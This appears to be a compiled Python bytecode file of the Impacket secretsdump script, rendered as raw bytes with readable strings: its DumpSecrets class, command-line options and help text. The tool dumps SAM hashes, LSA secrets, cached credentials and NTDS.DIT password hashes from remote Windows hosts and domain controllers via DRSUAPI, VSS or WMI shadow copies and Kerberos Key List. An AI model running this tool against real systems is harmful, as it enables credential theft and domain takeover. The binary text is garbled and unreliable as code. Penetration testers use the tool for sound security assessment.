o
    àý°jøu  ã                
   @   s¶  d dl mZ d dl mZ d dlZd dlZd dlZd dlZd dlZd dlm	Z	 d dl
mZ d dlmZ d dlmZ d dlmZmZ d d	lmZmZmZmZmZmZ d d
lmZ zeZW n	 eyc   Y nw G dd„ dƒZe dkrYej!j"du re #d¡ej!ƒe_!e$e	j%ƒ ej&dddZ'e'j(dddd e'j(dddd e'j(dddd e'j(dddd e'j(dddd e'j(ddd d e'j(d!dd"d e'j(d#dd$d e'j(d%dd&d e'j(d'dd(d e'j(d)dd*d e'j(d+dd,d e'j(d-dd.d/d0 e'j(d1de)d2d3 e'j(d4dd5d e'j(d6dd.d7d0 e'j(d8g d9¢d:d;d<d= e'j(d>dd?d e'j(d@ddAd e'j(dBddCdDd0 e'j(dEddFdGd0 e' *dH¡Z+e+j(dIddJdKdL e+j(dMddNdOdL e+j(dPdd.dQd0 e+j(dRdd.dSd0 e+j(dTddUd e+j(dVdd.dWd0 e+j(dXdd.dYd0 e+j(dZdd[d e' *d\¡Z+e+j(d]dd^d_dL e+j(d`ddad e+j(dbddcd e+j(ddddedfdL e+j(dgddhd e' *di¡Z+e+j(djddkdldL e+j(dmddkdndL e,ej-ƒdokrÞe' .¡  e /do¡ e' 0¡ Z1e 2e1j3e1j4¡ ee1j5ƒ\Z6Z7Z8Z9e1j:dusÿe1j;durAe1j<du se1j=du re >dp¡ e /do¡ n+e1j?dur'e >dq¡ e /do¡ ne9 @¡ drkr>e7dskr>e >dt¡ e /do¡ nde1_Ae1j<du sMe1j=du r]e1j?dur]e >du¡ e /do¡ e1j=du rse1jBdurse >dv¡ e /do¡ e1jCdu re1jDdu s…e1jEdu re >dw¡ e /do¡ e9 @¡ drkr«e7dskr«e1j?dur«e >dx¡ e /do¡ e9 @¡ drkrÎe7dskrÎe1jFdu rÍe1jGdu rÍe >dy¡ e /do¡ nQe1jHdu r×e9e1_He6du rÞdsZ6e1jIdurðe Je1jIe7e6e1¡ de1_Ke8dskre7dskre1jLdu re1jMd.u re1jNdu rd dzlOmOZO eOd{ƒZ8e1jNdurde1_Kee9e7e8e6e1ƒZPzeP Q¡  W dS  eRyX ZS ze T¡ jUejVkrHd dlWZWeW X¡  e >eS¡ W Y dZS[SdS dZS[Sww dS )|é    )Údivision)Úprint_functionN)Úversion)Úlogger)Úparse_target)ÚSMBConnection)ÚLDAPConnectionÚLDAPSessionError)ÚLocalOperationsÚRemoteOperationsÚ	SAMHashesÚ
LSASecretsÚ
NTDSHashesÚKeyListSecrets)ÚKeytabc                   @   s6   e Zd Zddd„Zdd„ Zdd„ Zd	d
„ Zdd„ ZdS )ÚDumpSecretsÚ Nc                 C   st  |j | _|j| _|| _|j| _|| _|| _|| _	d| _
d| _|j| _|j| _d | _d | _d | _d | _d | _d | _d | _|j| _|j| _|j| _|j| _|j| _ |j!| _"|j#| _$|j%| _&|j'| _(d| _)d| _*|j+| _,|j-| _.|j/| _0|j1| _2|j3| _4|j5| _6|j7| _8|j9| _:|j;| _<|j=| _>d| _?|j@| _A|jB| _C|jD| _E|jF| _G|jH| _I|| _J|jKd ur¸|jK Ld¡\| _
| _d S d S )Nr   Tú:)MÚuse_vssÚ_DumpSecrets__useVSSMethodÚuse_keylistÚ_DumpSecrets__useKeyListMethodÚ_DumpSecrets__remoteNameÚ	target_ipÚ_DumpSecrets__remoteHostÚ_DumpSecrets__usernameÚ_DumpSecrets__passwordÚ_DumpSecrets__domainÚ_DumpSecrets__lmhashÚ_DumpSecrets__nthashÚaesKeyÚ_DumpSecrets__aesKeyÚrodcKeyÚ_DumpSecrets__aesKeyRodcÚ_DumpSecrets__smbConnectionÚ_DumpSecrets__ldapConnectionÚ_DumpSecrets__remoteOpsÚ_DumpSecrets__SAMHashesÚ_DumpSecrets__NTDSHashesÚ_DumpSecrets__LSASecretsÚ_DumpSecrets__KeyListSecretsÚrodcNoÚ_DumpSecrets__rodcÚsystemÚ_DumpSecrets__systemHiveÚbootkeyÚ_DumpSecrets__bootkeyÚsecurityÚ_DumpSecrets__securityHiveÚsamÚ_DumpSecrets__samHiveÚntdsÚ_DumpSecrets__ntdsFileÚskip_samÚ_DumpSecrets__skipSamÚskip_securityÚ_DumpSecrets__skipSecurityÚhistoryÚ_DumpSecrets__historyÚ_DumpSecrets__noLMHashÚ_DumpSecrets__isRemoteÚ
outputfileÚ_DumpSecrets__outputFileNameÚkÚ_DumpSecrets__doKerberosÚjust_dcÚ_DumpSecrets__justDCÚjust_dc_ntlmÚ_DumpSecrets__justDCNTLMÚjust_dc_userÚ_DumpSecrets__justUserÚ
ldapfilterÚ_DumpSecrets__ldapFilterÚ	skip_userÚ_DumpSecrets__skipUserÚpwd_last_setÚ_DumpSecrets__pwdLastSetÚuser_statusÚ_DumpSecrets__printUserStatusÚ
resumefileÚ_DumpSecrets__resumeFileNameÚ_DumpSecrets__canProcessSAMLSAÚdc_ipÚ_DumpSecrets__kdcHostÚuse_remoteSSWMIÚ_DumpSecrets__remoteSSWMIÚuse_remoteSSWMI_NTDSÚ_DumpSecrets__remoteSSWMINTDSÚremoteSSWMI_remote_volumeÚ+_DumpSecrets__remoteSSMethodWMIRemoteVolumeÚremoteSSWMI_local_pathÚ+_DumpSecrets__remoteSSMethodWMIDownloadPathÚ_DumpSecrets__optionsÚhashesÚsplit)ÚselfÚ
remoteNameÚusernameÚpasswordÚdomainÚoptions© rg   ú‹/root/aizidognhua/tmp/workspace/projects/ec89d86c-575f-41c9-af57-ac45cbdbf775/venv/lib/python3.10/site-packages/../../../bin/secretsdump.pyÚ__init__M   sb   
ÿzDumpSecrets.__init__c              	   C   sb   t | j| jƒ| _| jr | j | j| j| j| j	| j
| j| j¡ d S | j | j| j| j| j	| j
¡ d S )N)r   r   r   r$   rB   ÚkerberosLoginr   r   r   r   r   r!   rU   Úlogin©ra   rg   rg   rh   Úconnect€   s   ÿ"zDumpSecrets.connectc                 C   s¸  | j r| j| _n| jd ur| j| _n| j| _| jr | j d¡}n| j dd¡d }| d¡}d| _|D ]}|  jd| 7  _q3| jd d… | _z:td| j | j| jƒ| _| j durk| j 	| j
| j| j| j| j¡ W d S | jj| j
| j| j| j| j| j| jd W d S  tyÛ } zNt|ƒ d	¡d
krÈtd| j | j| jƒ| _| j dur³| j 	| j
| j| j| j| j¡ n| jj| j
| j| j| j| j| j| jd n‚ W Y d }~d S W Y d }~d S d }~ww )NÚ.é   éÿÿÿÿr   zdc=%s,z	ldap://%sT)ÚkdcHostÚstrongerAuthRequiredr   z
ldaps://%s)rB   r   Ú_DumpSecrets__targetrU   r   r`   ÚbaseDNr   r%   rk   r   r   r   r   rj   r!   r	   ÚstrÚfind)ra   ÚdomainPartsre   ÚiÚerg   rg   rh   ÚldapConnectˆ   sB   




$ÿ
 ÿýþ€ûzDumpSecrets.ldapConnectc                 C   sD  zd }| j r‡d| _d| _z|  ¡  W n) ty< } zt d¡d ur1| jdu r1t 	dt
|ƒ ¡ n‚ W Y d }~nd }~ww t| j| j| j| jƒ| _| j | jj¡ | j | j| j| j¡^}}}}|| _|| _|| _|ro|d nd | _t| jƒ}| ¡ }| jd ur…| ¡ | _n| j  ¡ dkr»| j!dkr»d| _d| _| jr°t| jƒ}| ¡ }| jd ur¯| ¡ | _nìdd l"}	|	 #| j$¡}nád| _d }| j%d urït &d| j' ¡ z|  (¡  W n tyî } zt )d	t
|ƒ ¡ W Y d }~nd }~ww zqz|  ¡  W n, ty" } zt d¡d ur| jdu rt 	dt
|ƒ ¡ n‚ W Y d }~nd }~ww t| j| j| j| jƒ| _| j | jj¡ | j*du rI| j+du rI| j,du sO| jdu r_| j -¡  | j ¡ }| j ¡ | _W n; ty› } z.d| _.t
|ƒ /d
¡rˆt d¡d urˆ| jdu rˆt )d¡ n	t )dt
|ƒ ¡ W Y d }~nd }~ww | j,du rØzt0| j'| j| j1| j2| jƒ| _3| j3 4¡  W W d S  ty× } zt )dt
|ƒ ¡ W Y d }~W d S d }~ww | j*du r¯| j+du r¯| j.r¯| j5s;z2| jdu rù| j 6¡ }
n| j}
t7|
|| j| j8| j9| j:d| _;| j; 4¡  | j<d ur| j; =| j<¡ W n ty: } zt )dt
|ƒ ¡ W Y d }~nd }~ww | j>s¯zB| jdu rL| j ?¡ }n| j}t@||| j| j| j8d| _A| jA B¡  | j<d urn| jA C| j<¡ | jA D¡  | j<d ur€| jA E| j<¡ W n- ty® } z t F¡ jGtjHkr›dd lI}| J¡  t )dt
|ƒ ¡ W Y d }~nd }~ww | jdu rÐ| jrÍ| jd urÍ| j K¡ d urÍ| j L¡ }nd }n| j}|d urz| jdu rå| j M¡ }ntN O|¡}W n ty } zt 	d|¡ W Y d }~nd }~ww tN||f| j| j8| j| j| j| j| j+| j:| jP| j<| jQ| jR| j%| j9|dœŽ| _Sz| jS 4¡  W ne ty— } zXt F¡ jGtjHkrLdd lI}| J¡  t
|ƒ /d¡dkre| jS T¡ }|d uret U|¡ t )|¡ | jQsr| j%r‚t
|ƒ /d¡dkr‚t &d¡ n| jdu rt &d¡ W Y d }~nd }~ww |  V¡  W d S  ttWfy! } ztt F¡ jGtjHkrºdd lI}| J¡  t )|¡ | jSd urtX|tWƒr	 tYdƒ}|  ¡ dkrÚd}n|  ¡ dkräd}n|  ¡ dkrîd}nqÌ|dkr| jS T¡ }|d urt U|¡ z|  V¡  W n   Y W Y d }~d S W Y d }~d S d }~ww )NFTÚ
KRB5CCNAMEz9SMBConnection didn't work, hoping Kerberos will help (%s)r   ÚLOCALr   z7Querying %s for information about domain users via LDAPzLDAP connection failed: %sÚSTATUS_USER_SESSION_DELETEDz[Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-userzRemoteOperations failed: %sz=Something went wrong with the Kerberos Key List approach.: %s)ÚisRemoter;   ÚprintUserStatusÚ
pwdLastSetz SAM hashes extraction failed: %s)r~   r;   z LSA hashes extraction failed: %sz&Failed to resolve local domain SID: %s)r~   r;   ÚnoLMHashÚ	remoteOpsÚuseVSSMethodÚremoteSSMethodWMINTDSÚjustNTLMr€   ÚresumeSessionÚoutputFileNameÚjustUserÚskipUserÚ
ldapFilterr   ÚlocalDomainSidÚERROR_DS_DRA_BAD_DNÚERROR_DS_NAME_ERROR_NOT_UNIQUEzêYou just got that error because there might be some duplicates of the same name. Try specifying the domain name for the user as well. It is important to specify it in the form of NetBIOS domain name/user (e.g. contoso/Administratror).zQSomething went wrong with the DRSUAPI approach. Try again with -use-vss parameterz"Delete resume session file? [y/N] ÚNÚY)ZrW   r>   r   rm   Ú	ExceptionÚosÚgetenvrB   ÚloggingÚdebugru   r   r$   rU   r%   r&   ÚsetExecMethodr^   Úexec_methodÚcreateSSandDownloadWMIr[   r]   rY   r4   r.   r2   r6   r
   Ú
getBootKeyÚcheckNoLMHashPolicyr=   r   Úupperr   ÚbinasciiÚ	unhexlifyr0   rJ   Úinfor   rz   ÚerrorrD   rF   r   ÚenableRegistryrS   rv   r   r,   r#   r*   Údumpr8   ÚsaveSAMr   r<   rP   rN   r'   r@   Úexportr:   ÚsaveSECURITYr   r)   ÚdumpCachedHashesÚexportCachedÚdumpSecretsÚexportSecretsÚ	getLoggerÚlevelÚDEBUGÚ	tracebackÚ	print_excÚgetRRPÚsaveNTDSÚgetDomainSidr   ÚgetLocalDomainSidrR   rH   rL   r(   ÚgetResumeSessionFileÚunlinkÚcleanupÚKeyboardInterruptÚ
isinstanceÚinput)ra   r‹   ry   Úsam_pathÚsystem_pathÚsecurity_pathÚ	ntds_pathÚlocalOperationsÚbootKeyr›   ÚSAMFileNameÚSECURITYFileNamer«   ÚNTDSFileNameÚ
resumeFileÚanswerrg   rg   rh   r    °   s„  þ€ú
ÿ
ÿ


€


€
€ÿþ€ú
0

€ €ø"€ÿ 
€€ÿ
ÿ

€€ü$

€€ÿ
ú



$
€ð
ö



þ€ézDumpSecrets.dumpc                 C   sb   t  d¡ | jr| j ¡  | jr| j ¡  | jr| j ¡  | jr%| j ¡  | jr/| j ¡  d S d S )NzCleaning up... )r“   r   r&   Úfinishr'   r)   r(   r*   rl   rg   rg   rh   r³   ~  s   




ÿzDumpSecrets.cleanup)r   r   r   N)Ú__name__Ú
__module__Ú__qualname__ri   rm   rz   r    r³   rg   rg   rg   rh   r   L   s    
3( Or   Ú__main__Úutf8TzfPerforms various techniques to dump secrets from the remote machine without executing any agent there.)Úadd_helpÚdescriptionÚtargetÚstorezb[[domain/]username[:password]@]<targetName or address> or LOCAL (if you want to parse local files))ÚactionÚhelpz-tsÚ
store_truez&Adds timestamp to every logging outputz-debugzTurn DEBUG output ONz-systemzdSYSTEM hive to parse (only binary REGF, as .reg text file lacks the metadata to compute the bootkey)z-bootkeyzbootkey for SYSTEM hivez	-securityzSECURITY hive to parsez-samzSAM hive to parsez-ntdszNTDS.DIT file to parsez-resumefilez—resume file name to resume NTDS.DIT session dump (only available to DRSUAPI approach). This file will also be used to keep updating the session's statez	-skip-samz*Do NOT parse the SAM hive on remote systemz-skip-securityz/Do NOT parse the SECURITY hive on remote systemz-outputfilezPbase output filename. Extensions will be added for sam, secrets, cached and ntdsz-use-vssFz6Use the NTDSUTIL VSS method instead of default DRSUAPI)rÌ   ÚdefaultrÍ   z-rodcNozLNumber of the RODC krbtgt account (only avaiable for Kerb-Key-List approach))rÌ   ÚtyperÍ   z-rodcKeyzUAES key of the Read Only Domain Controller (only avaiable for Kerb-Key-List approach)z-use-keylistz7Use the Kerb-Key-List method instead of default DRSUAPIz-exec-method)ÚsmbexecÚwmiexecÚmmcexecú?rÑ   zPRemote exec method to use at target (only when using -use-vss). Default: smbexec)ÚchoicesÚnargsrÏ   rÍ   z-use-remoteSSWMIzhRemotely create Shadow Snapshot via WMI and download SAM, SYSTEM and SECURITY from it, the parse locallyz-use-remoteSSWMI-NTDSz¨Dump NTDS.DIT also when using the Remote Shadow Snapshot Method via WMI. Use it with dumping from a DC. IMPORTANT: this flag only works when also using -use-remoteSSWMIz-remoteSSWMI-remote-volumezC:\zfRemote Volume to perform the Shadow Snapshot and download SAM, SYSTEM and SECURITY. It defaults to C:\z-remoteSSWMI-local-pathrn   zaLocal path to download SAM, SYSTEM and SECURITY from Shadow Snapshot. It defaults to current pathzdisplay optionsz-just-dc-userÚUSERNAMEztExtract only NTDS.DIT data for the user specified. Only available for DRSUAPI approach. Implies also -just-dc switch)rÌ   ÚmetavarrÍ   z-ldapfilterÚ
LDAPFILTERzˆExtract only NTDS.DIT data for specific users based on an LDAP filter. Only available for DRSUAPI approach. Implies also -just-dc switchz-just-dcz:Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)z-just-dc-ntlmz-Extract only NTDS.DIT data (NTLM hashes only)z
-skip-userz‹Do NOT extract NTDS.DIT data for the user specified. Can provide comma-separated list of users to skip, or text file with one user per linez-pwd-last-setzWShows pwdLastSet attribute for each NTDS.DIT account. Doesn't apply to -outputfile dataz-user-statusz+Display whether or not the user is disabledz-historyzCDump password history (NTDS and SAM hashes), and LSA secrets OldValÚauthenticationz-hasheszLMHASH:NTHASHz$NTLM hashes, format is LMHASH:NTHASHz-no-passz&don't ask for password (useful for -k)z-kzÁUse Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command linez-aesKeyzhex keyz<AES key to use for Kerberos Authentication (128 or 256 bits)z-keytabz"Read keys for SPN from keytab fileÚ
connectionz-dc-ipz
ip addresszoIP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameterz
-target-ipz£IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot resolve itro   zB-just-dc-user switch is not supported in VSS mode nor WMI VSS modezRresuming a previous NTDS.DIT dump session not compatible with -just-dc-user switchr|   r   z*-just-dc-user not compatible in LOCAL modezWresuming a previous NTDS.DIT dump session is not supported in VSS mode nor WMI VSS modez?-use-remoteSSWMI-NTDS requires -use-remoteSSWMI to be specifiedzTBoth the RODC ID number and the RODC key are required for the Kerb-Key-List approachzHresuming a previous NTDS.DIT dump session is not supported in LOCAL modezKEither the SYSTEM hive or bootkey is required for local parsing, check help)Úgetpassz	Password:)YÚ
__future__r   r   ÚargparseÚcodecsr“   r‘   ÚsysÚimpacketr   Úimpacket.examplesr   Úimpacket.examples.utilsr   Úimpacket.smbconnectionr   Úimpacket.ldap.ldapr   r	   Úimpacket.examples.secretsdumpr
   r   r   r   r   r   Úimpacket.krb5.keytabr   Ú	raw_inputr¶   Ú	NameErrorr   rÃ   ÚstdoutÚencodingÚ	getwriterÚprintÚBANNERÚArgumentParserÚparserÚadd_argumentÚintÚadd_argument_groupÚgroupÚlenÚargvÚ
print_helpÚexitÚ
parse_argsrf   ÚinitÚtsr”   rÊ   re   rc   rd   rb   rG   rI   r   rX   rž   rQ   rš   rC   rV   r   r+   r"   r-   r/   r   ÚkeytabÚloadKeysFromKeytabrA   r_   Úno_passr    rÜ   Údumperr    r   ry   r¨   r©   rª   r«   r¬   rg   rg   rg   rh   Ú<module>   s0  4 ÿ  
C
ÿ
ÿ
ÿÿÿ
ÿ
ÿ

ÿ
ÿ
ÿ
ÿ
ÿ
ÿ


ÿ



$



$

$



€
8€ü ê